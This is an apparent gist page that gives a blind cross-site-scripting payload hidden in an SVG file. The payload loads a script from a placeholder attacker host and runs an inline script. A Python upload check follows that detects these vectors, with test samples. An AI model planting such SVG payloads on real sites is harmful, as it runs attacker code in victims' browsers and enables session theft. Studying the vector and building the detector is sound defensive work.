@l34r00t
Last active November 24, 2022 08:47
Blind XSS in SVG FILE
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"
height="200"
zoomAndPan="disable"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:space="preserve">
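<!-- Script loaded from an external URL (placeholder host) -->
<script xlink:href="https://your_server" />
<!-- Inline script: runs in the serving origin when the SVG is opened directly, not when it is loaded through an img tag -->
<script>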
//<![CDATA[
alert(document.domain);
]]>
</script>
</svg>
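An upload-side check for the two script vectors in the SVG above, as an added example that is not part of the original gist. The function name, the element list and the sample files (including the `example.invalid` host) are assumptions made for illustration, and the parser is Python's standard library one.

```python
import xml.etree.ElementTree as ET

# Elements that can execute or embed active content inside an SVG (assumed list).
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
RISKY_HREF_PREFIXES = ("javascript:", "http:", "https:", "//")


def local(name):
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1]


def find_active_content(svg_bytes):
    """Return (element, reason) findings for an uploaded SVG; empty list = nothing flagged."""
    # Refuse entity declarations outright instead of expanding them.
    if b"<!ENTITY" in svg_bytes:
        return [("doctype", "entity declaration")]
    findings = []
    for el in ET.fromstring(svg_bytes).iter():
        tag = local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append((tag, "active element"))
        for attr, value in el.attrib.items():
            name = local(attr).lower()  # matches both href and xlink:href
            if name.startswith("on"):
                findings.append((tag, "event handler " + name))
            elif name == "href" and value.strip().lower().startswith(RISKY_HREF_PREFIXES):
                findings.append((tag, "external or script href"))
    return findings


# Constructed sample with the same structure as the gist: one external script, one inline.
MALICIOUS_SAMPLE = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
 "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve">
<script xlink:href="https://example.invalid/x.js" />
<script>//<![CDATA[
/* inline body */
]]></script>
</svg>"""

# Constructed benign sample: static shapes only.
CLEAN_SAMPLE = b"""<svg width="10" height="10" xmlns="http://www.w3.org/2000/svg">
<rect width="10" height="10" fill="#336699" /></svg>"""

if __name__ == "__main__":
    for label, data in (("malicious", MALICIOUS_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, find_active_content(data))
```

A non-empty result is a reason to reject the upload or to serve it with `Content-Disposition: attachment` and a restrictive `Content-Security-Policy`, so the file is never rendered as a document in the application's origin.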